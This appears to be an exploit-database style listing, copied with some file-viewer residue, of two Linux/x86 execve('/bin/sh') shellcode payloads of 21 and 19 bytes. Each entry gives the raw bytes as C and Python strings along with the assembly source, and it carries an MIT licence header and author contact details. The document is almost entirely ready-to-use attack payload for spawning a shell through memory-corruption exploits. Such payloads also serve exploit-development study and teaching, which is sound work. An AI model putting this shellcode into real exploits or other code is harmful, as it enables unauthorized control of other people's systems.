101 lines
No EOL
4.9 KiB
Text
101 lines
No EOL
4.9 KiB
Text
;================================================================================
|
|
Linux/x86 - execve(/bin/sh") shellcode (21 bytes)
|
|
;================================================================================
|
|
; The MIT License
|
|
;
|
|
; Copyright (c) <year> <copyright holders>
|
|
;
|
|
; Permission is hereby granted, free of charge, to any person obtaining a copy
|
|
; of this software and associated documentation files (the "Software"), to deal
|
|
; in the Software without restriction, including without limitation the rights
|
|
; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
|
; copies of the Software, and to permit persons to whom the Software is
|
|
; furnished to do so, subject to the following conditions:
|
|
;
|
|
; The above copyright notice and this permission notice shall be included in
|
|
; all copies or substantial portions of the Software.
|
|
;
|
|
; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
|
; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
|
; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
|
; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
|
; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
|
; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
|
; THE SOFTWARE.
|
|
;================================================================================
|
|
; Name : Linux/x86 - execve(/bin/sh") shellcode (21 bytes)
|
|
; Author : WangYihang
|
|
; Email : wangyihanger@gmail.com
|
|
; Tested on: Linux_x86
|
|
; Shellcode Length: 21
|
|
;================================================================================
|
|
; Shellcode :
|
|
char shellcode[] = "\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
|
|
;================================================================================
|
|
; Python :
|
|
shellcode = "\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
|
|
;================================================================================
|
|
; Assembly language code :
|
|
global _start
|
|
_start:
|
|
xor ecx, ecx
|
|
push 0bH
|
|
pop eax
|
|
cdq
|
|
push edx
|
|
push "//sh"
|
|
push "/bin"
|
|
mov ebx, esp
|
|
int 80H
|
|
;================================================================================
|
|
|
|
2017-03-29 12:27 GMT+08:00 wangyihanger@gmail.com <wangyihanger@gmail.com>:
|
|
|
|
Linux/x86 - execve(/bin/sh") shellcode (19 bytes)
|
|
;================================================================================
|
|
; The MIT License
|
|
;
|
|
; Copyright (c) <year> <copyright holders>
|
|
;
|
|
; Permission is hereby granted, free of charge, to any person obtaining a copy
|
|
; of this software and associated documentation files (the "Software"), to deal
|
|
; in the Software without restriction, including without limitation the rights
|
|
; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
|
; copies of the Software, and to permit persons to whom the Software is
|
|
; furnished to do so, subject to the following conditions:
|
|
;
|
|
; The above copyright notice and this permission notice shall be included in
|
|
; all copies or substantial portions of the Software.
|
|
;
|
|
; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
|
; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
|
; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
|
; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
|
; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
|
; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
|
; THE SOFTWARE.
|
|
;================================================================================
|
|
; Name : Linux/x86 - execve(/bin/sh") shellcode (19 bytes)
|
|
; Author : WangYihang
|
|
; Email : wangyihanger@gmail.com
|
|
; Tested on: Linux_x86
|
|
; Shellcode Length: 19
|
|
;================================================================================
|
|
; Shellcode :
|
|
char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
|
|
;================================================================================
|
|
; Python :
|
|
shellcode = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
|
|
;================================================================================
|
|
; Assembly language code :
|
|
global _start
|
|
_start:
|
|
push 0bH
|
|
pop eax
|
|
cdq
|
|
push edx
|
|
push "//sh"
|
|
push "/bin"
|
|
mov ebx, esp
|
|
int 80H
|
|
;================================================================================ |